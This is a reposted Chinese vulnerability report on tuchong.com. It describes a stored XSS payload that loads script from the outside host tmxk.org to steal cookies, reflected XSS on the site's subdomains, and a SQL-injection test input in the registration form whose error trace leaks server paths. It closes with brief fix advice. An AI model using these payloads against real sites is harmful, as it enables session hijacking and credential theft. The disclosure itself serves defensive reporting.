来源:自学PHP网 时间:2015-04-17 14:11 作者: 阅读:次
[导读] 危害大吧, cookies只要拿到了 账号+MD5密码就到手了,然后......详细说明:http://tuchong.com/settings/注册了在这里配置: 在标签处插入:ascript/src=//tmxk.org;!--a保存.个人主页触发了 哦\(^o^)/~ht......
|
危害大吧, cookies只要拿到了 账号+MD5密码就到手了,然后......
详细说明:http://tuchong.com/settings/ 注册了在这里配置:  在标签处插入: a><script/src=//tmxk.org>;<!--<a 保存. 个人主页触发了 哦\(^o^)/~ http://tuchong.com/272288/  这...... 自己测试了下盗取cookie危害大- -  还有个通杀的反射型xss: tochong.com所以子站xxxxx.tuchong.com/?view=list 都有Xss漏洞 其他的反射型Xss就一堆了希望tuchong能修复,该转义 该编码 该过滤... Zend配置也没配置好,爆路径的也很多.. 谷歌下site:tuchong.com php 或者随便举个列子 www.2cto.com 注册: <input type="text" required="" id="regEmail" name="user_email"> user_email我改成[0x7c or '1'='1'#] {"result":"ERROR","message":"SQLSTATE[HY093]: Invalid parameter number: no parameters were bound","code":"HY093","trace":[{"file":"\/srv\/http\/tuchong\/library\/Jezo\/Db\/Adapter.php","line":945,"function":"execute","class":"PDOStatement","type":"->","args":[[]]},{"file":"\/srv\/http\/tuchong\/library\/Jezo\/Db\/TableSelect.php","line":155,"function":"query","class":"Jezo_Db_Adapter","type":"->","args":[{}]},{"file":"\/srv\/http\/tuchong\/application\/api\/controllers\/AccountController.php","line":297,"function":"fetchRow","class":"Jezo_Db_TableSelect","type":"->","args":[]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Controller\/Action.php","line":513,"function":"registerAction","class":"AccountController","type":"->","args":[]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Controller\/Dispatcher\/Standard.php","line":295,"function":"dispatch","class":"Zend_Controller_Action","type":"->","args":["registerAction"]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Controller\/Front.php","line":954,"function":"dispatch","class":"Zend_Controller_Dispatcher_Standard","type":"->","args":[{},{"headersSentThrowsException":true}]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Application\/Bootstrap\/Bootstrap.php","line":97,"function":"dispatch","class":"Zend_Controller_Front","type":"->","args":[]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Application.php","line":366,"function":"run","class":"Zend_Application_Bootstrap_Bootstrap","type":"->","args":[]},{"file":"\/srv\/http\/tuchong\/public\/api.php","line":38,"function":"run","class":"Zend_Application","type":"->","args":[]}]} 其他的- -||不说了..... 修复方案: 该转义 该编码 该过滤... zend配置好. 作者 _Evil |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
